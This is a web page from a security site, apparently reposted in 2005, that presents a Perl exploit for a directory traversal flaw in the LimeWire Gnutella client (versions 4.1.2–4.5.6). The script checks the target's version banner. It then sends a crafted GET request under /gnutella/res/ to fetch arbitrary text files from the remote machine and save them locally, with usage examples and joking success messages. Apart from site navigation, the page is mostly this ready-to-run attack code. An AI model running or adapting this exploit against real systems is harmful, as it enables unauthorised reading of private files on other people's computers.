首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LimeWire File Disclosure Exploit
来源:www.vfocus.net 作者:Marco 发布时间:2005-03-29  

LimeWire File Disclosure Exploit

Summary
This script exploits recently reported vulnerability in LimeWire Gnutella client, LimeWire Gnutella Client Directory Traversal and File Disclosure. The script allows fetching text files from system running vulnerable versions of LimeWire.

Credit:
The information has been provided by Marco van Berkum.

Details
Vulnerable Systems:
* LimeWire versions 4.1.2 up to version 4.5.6

#!/usr/bin/perl
#
# exploits LimeWire 4.1.2 - 4.5.6
#
# This is just a quick and dirty script to grab textfiles. Doesn't work on binaries.
#
# Note: Using this code to 'hack' LimeWire clients other than your own is illegal and should NOT be done!
#
# (c)2005 Marco van Berkum

use IO::Socket;

if(!$ARGV[2] || $ARGV[1] !~ /\\/) {
die "Usage: ./limehack.pl host \"file you want\" outputfile [nondefaultport if needed]\n\nExample: ./limehack.pl 127.0.0.1 \"C:\\Windows\\win.ini\" win.ini \(don\'t forget the quotes\)\nUse the silly DOS way when requesting files with spaces, Progra~1 etc..\n\n";
}

$host = $ARGV[0];
$file = $ARGV[1];
$outputfile = $ARGV[2];
$port = $ARGV[3];
$readtimeout = "15"; # set longer for big files

if(!$port) { $port = 6346; }

# open sock
my $sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => '5') || die "Connection refused\n";

# wheee socket;
if($sock) {
print $sock "HEAD ?\n\n";
sleep(5);
sysread($sock, $buff, 1000);
close($sock);
}

($temp, $server, $temp) = split(/Request|Content-Type/,$buff);
undef($buff);
($temp, $version) = split(/Server: /,$server);
chomp($version);

if($version =~ /limewire/i) {
($temp, $versionnodots) = split(/\//,$version);
$versionnodots =~ s/\.//g;
if($versionnodots >= 412 && $versionnodots <= 456) {
print("Vulnerable LimeWire!\n");
} else { die "Not a vulnerable LimeWire server \:\(\n"; }

} else { die "Not a LimeWire server!\n" }

print "Requesting file: $file.....\n";
my $sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => '5') || die "Connection refused, host died?\n";

# wheee socket;
if($sock) {
print $sock "GET /gnutella/res/$file HTTP/1.1\n\n";

sleep($readtimeout);
sysread($sock, $buff, 9999999);
}

if($buff =~ /200 OK/) {
print "\nGot it!\nYUO ARE TEH HAX0R NOW!!!1111oneoneone\n";
print "Thanks for using teh LimeWire haxx0rpr0ggie, the file is saved as $outputfile!\n";
($temp, $data) = split(/Content-Length:.*/,$buff);
$data =~ s/^\n//g;
open FILE, ">$outputfile";
print FILE "$data";
close FILE;
} else {
print "File not found!\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows WAB DoS
·OpenMosixView Multiple Race Co
·MailEnable Format String Vulne
·Tincat Buffer Overflow
·Ocean FTP DoS (Exploit)
·Smail preparse_address_1() Hea
·phpBB UID Exploit (Perl Exploi
·FunLabs Games Multiple Vulnera
·FreeCiv Server DoS Exploit
·PunBB v1.2.2 functions.php Rem
·MCPWS Personal DoS Exploit
·Mtftpd Server v0.0.3 Remote Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved